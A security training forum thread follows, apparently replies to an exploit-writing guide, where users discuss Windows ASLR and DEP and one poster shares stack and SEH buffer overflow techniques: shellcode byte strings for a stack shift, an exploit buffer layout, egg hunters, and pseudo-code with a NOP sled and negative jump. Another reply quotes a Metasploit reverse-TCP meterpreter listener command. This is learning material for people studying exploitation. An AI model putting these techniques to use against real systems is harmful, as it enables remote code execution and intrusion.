Jump to content
matugm

Matu's exploit guide!

Recommended Posts

Omega

I like that idea.. perhaps we should find some good challenges for this. On that note, have you tried a go at the new Gold cert? You just may like it... :)

Also.. perhaps you should update your location to something Kali specific :-D

Yeah of course Thanks smile.gif I will take Gold Cert soon smile.gif busy in real life

Share this post


Link to post
Chris:/*

This is a very well done piece, I see a number of concepts laid out well that normally take a couple of books to explain. Nice Job!

Share this post


Link to post
roger.g

I have a question about this tutorial.

I try the tutorial on a 64-bit computer and I have Windows 7 installed.

When I try to send 500 A or 5 A, the application gives me full network error.

I tried it on Windows XP 64-bit and everything works.

Is that to do this kind of thing Windows XP is better than Windows 7?

Share this post


Link to post
Dan.North

Believe Windows 7 has ASLR (Address Space Layout Randomisation) & DEP (Data Execution Prevention) enabled by default. 

 

I believe this means the memory isn't always loaded into the same area of virtual memory every time meaning a set exploit won't always work. Also even if it would DEP stops it being executed from the stack** 

 

 

Would be good to get some good tutorials on bypassing some of this as I believe there are methods to do it (egghunters etc).

 

 

** = this is a really basic and probably poor explanation but should give you something to look into

Share this post


Link to post
schuydorsey

ASLR is enabled on Vista and Server 2008 and above by default. The default setting for DEP is to only be enabled on core Windows programs/processes. You have to manually enable DEP for the rest of the processes.

 

This is covered from a defensive standpoint in PND. ;)

  • Like 1

Share this post


Link to post
Dan.North

haha I'm not there yet..... But that's useful to know as I'd just assumed it'd be enabled by default :o

 

Is that down to backwards compatibility ?? Some programs maybe executing instructions from there ?

Just seems strange to not enable it  :o

Share this post


Link to post
schuydorsey

A LOT of third party programs are insecurely coded and DEP breaks them. About 1/2 of my client sites where I have deployed EMET/DEP, I find a vendor support application that is broken because the vendor executed instructions from the stack without marking that area as executable. Sometimes the vendor is willing to fix their program.. sometimes they aren't.

  • Like 1

Share this post


Link to post
_VL_

Great thread. Just got a chance to read through it.

Share this post


Link to post
jander42

Great Introduction, could you re-upload those pictures?

If the person who started this thread is still around ofc :P

Share this post


Link to post
herman

I recently started to dive into memory exploitation and worked through Stack BoF, SEH Stack BoF , Heap Spraying and Egg Hunter examples. If there is an interest I will throw the general exploitation process here but I would have to gather some screenshots and images.

 

A few handy things I came across (source: corelan.be / youtube):

 

- Stack BoF Exploit Reliability -
 
Add a "Prepend" or "Stack Shift". Often used on windows exploits to make room on the stack for the decoder to properly decode the payload / shellcode. Also prevents exploit becoming corrupted of any data on the stack. 
 
Example: 
 
prepend = "\x81\xC4\xFF\xEF\xFF\xFF" # add esp, -1001h (4097)
prepend += "\x44" # inc esp
 
In case you’re wondering why they use  -1001 and then increase esp again to -1000, the opcode for add esp,-1000 contains a null byte.
 
Exploit will look like: [enough junk to overwrite EIP][call esp addr][$prepend][iNT3][shellcode]
 
Create the correct instruction by using metasm in Metasploit. Example: 
metasm > add esp,-450
"\x81\xc4\x3e\xfe\xff\xff"
 

- What to do if space for a payload is limited? -

  • Use a "staged" metasploit payload as they require less space
  • Use a different (or no) encoding of the payload
  • Use an egg hunter (summary: payload can be located anywhere in memory, we put a tag in front of it, on exploitation we search for it in memory) Drawback: 100% CPU utilization, try to use as last resort
  • Use a negative jump: this only works if we have enough space on the begin, for example a SEH BoF
Example:
We overwrite 4403 bytes before we reach the SEH handler. This space can be used to place our payload but we must jump back to it. Some pseudo-code:
 

distance_to_seh = [value]  #e.g. 4403

eip = [poppopret] #an instruction from a target lib is preferred over OS lib

shellcode = [array of shellcode] #our payload

pad = "\x90" * (distance_to_seh - len(shellcode)) #adds NOPsled before payload

jmp_min = "\xE9\x98\xEF\xFF\xFF" #goes back 4000 bytes to land into the NOP sled



buf = pad + shellcode + struct.pack('<I', eip) + jmp_min #ready to xploit

That's all folks... Keep on learning  ^_^
 

 

  • Like 2

Share this post


Link to post
Francesco

Great :) It's always nice to see you guys sharing tuts/guides!

 

Corelan exploit writing tutorials are really great. Here other few resources worth to be read.

If you are going to dig deeper in SEH this is also a valid resource.

 

Keep up the good work herman! 

Share this post


Link to post
ryan.collins

I'm sure this is a great tutorial, but all i'm seeing for code snippets is 

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

Every place where you list a command I just see that same msfcli line. Maybe it's just my browser or something :( 

Share this post


Link to post

Please sign in to comment

You will be able to leave a comment after signing in



Sign In Now
×